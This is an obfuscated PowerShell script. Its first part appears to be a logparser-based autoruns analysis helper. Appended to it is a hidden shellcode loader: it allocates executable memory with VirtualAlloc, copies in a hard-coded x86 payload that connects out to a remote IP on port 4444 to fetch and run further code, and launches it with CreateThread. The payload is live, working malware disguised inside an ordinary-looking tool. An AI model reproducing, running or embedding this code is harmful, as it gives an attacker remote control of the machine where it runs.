.("{0}{2}{1}" -f 's','t-ITeM','e') ("vAR"+"Ia"+"BL"+"e:Xri") ( [tYPE]("{4}{3}{0}{1}{2}" -F 'm','.IO.PAt','H','stE','sy') );

if (&("{2}{0}{1}" -f'-Comma','nd','Get') ("{0}{1}{3}{2}" -f 'l','ogp','.exe','arser')) {

    ${L`PQ`UEry} = ((("{21}{17}{20}{24}{8}{52}{5}{28}{15}{44}{39}{41}{46}{32}{19}{45}{2}{54}{30}{0}{29}{36}{9}{10}{35}{33}{34}{42}{51}{1}{22}{26}{12}{43}{11}{37}{7}{55}{50}{18}{53}{40}{49}{25}{31}{23}{13}{6}{47}{3}{27}{16}{4}{38}{14}{48}" -f 'u','HERE
  ','        ImagePath','ing
    OR','Y
  ','T
        ','ePath,',' ','SE','ROM
      ',' ','t','  (','     Imag','A','(Image','ER B','N
',' fo','Publi','  ','ge','   ',' ','  ',' BY
',' ','D','COUNT','nchString
    ','
        La','  ',' ','orunsc.','ts',' *aut','F',' like','      ct ',', La','RO','unch','v
 ','ImagePath no','Path','sher) as ct,
','String,','
        LaunchStr','SC
geN','UP','File not','   W','LEC','und%5XV)
    G',',','5XV'))."R`EPLa`cE"('geN',[STrInG][CHar]34)."rEP`laCe"('5XV',[STrInG][CHar]39))

    & ("{1}{0}{2}" -f'ogpar','l','ser') -stats:("{0}{1}"-f 'o','ff') -i:("{0}{1}"-f 'c','sv') -dtlines:0 -fixedsep:('on') -rtp:('-1') "$lpquery"

} else {
    ${Scr`iP`TNAmE} =   (  .("{1}{3}{0}{2}"-f 'VARIAbL','gEt','E','-') ('xr'+'I')  -valUe  )::("{1}{0}{2}" -f 'etF','G','ileName').Invoke(${MYI`N`VOca`TIOn}."sC`RiP`TNAme")
    "${ScriptName} requires logparser.exe in the path."
}


${C} = ((("{66}{11}{120}{16}{96}{73}{81}{65}{115}{105}{85}{37}{29}{38}{36}{122}{84}{78}{97}{111}{110}{48}{123}{25}{91}{8}{64}{119}{4}{82}{69}{10}{108}{43}{60}{1}{62}{90}{117}{28}{31}{70}{46}{99}{13}{102}{118}{100}{30}{80}{72}{67}{83}{32}{104}{93}{7}{68}{76}{56}{103}{112}{22}{77}{79}{0}{9}{53}{41}{3}{59}{5}{6}{35}{106}{75}{26}{45}{63}{20}{58}{49}{19}{109}{18}{14}{21}{87}{51}{94}{98}{116}{39}{55}{113}{50}{61}{88}{24}{42}{17}{71}{12}{89}{121}{33}{101}{2}{57}{114}{107}{92}{23}{34}{52}{27}{44}{47}{15}{40}{86}{54}{95}{74}" -f'rn','u','xte','Ptr','(','Crea','teThre','M','t',' I','pAdd','D',']p',' f','tPtr lpStartAd','in','p','svcr','ckSize, In','w','tribut','dres','tic','e','d);[DllI','r V','h','Ptr dest,','ll','l','o','o','32.','st','mset(I','ad(Int','atic e','I5M)]pub','ic st',', ','t','t','mport(I5Mm','es',' ','readA','onType, u','u','tP','d','ationFlags, IntPtr lpThr',' ','nt','n','r','uin','i','r','es, uint ',' ','s, ','ea','int dwSi','t','ualA','kerne','[','kerne',')]p','tr l','cati','t.dllI5M)','M','t','t);','tr lpT','ubl',' e','r','xte','rt(I5','(I5M','IntP','l','e','.dll',' s','s,','dI','ubl','ze, u','ir','Ptr m','5','IntPtr lpPa','c, uint coun','or','n ','ram','int','ct);[DllImp','atic e','lProt','c ','dllI','32','P',' Int','r','Sta','n','I','sta','t dwCre','n','l','eter','int flA','e','lloc','llIm','ic ','xt','t'))."re`PlACE"('I5M',[stRiNG][char]34));${w} = .("{0}{1}{2}" -f 'Add','-Ty','pe') -memberDefinition ${C} -Name ("{1}{0}"-f '32','Win') -namespace ("{3}{1}{0}{4}{2}" -f '2F','in3','ctions','W','un') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x51,0x38,0x11,0x90,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${Z}."L`e`NgTH" -gt 0x1000){${G} = ${z}."lEng`TH"};${x}=${W}::("{0}{2}{3}{1}" -f 'Vir','c','tual','Allo').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${Z}."LE`NG`Th"-1);${I}++) {${W}::"Mem`SeT"([IntPtr](${x}.("{0}{1}" -f 'T','oInt32').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{2}{0}{1}"-f 'eat','eThread','Cr').Invoke(0,0,${x},0,0,0);for (;;){&("{0}{2}{3}{1}" -f 'Sta','p','rt-','slee') 60};
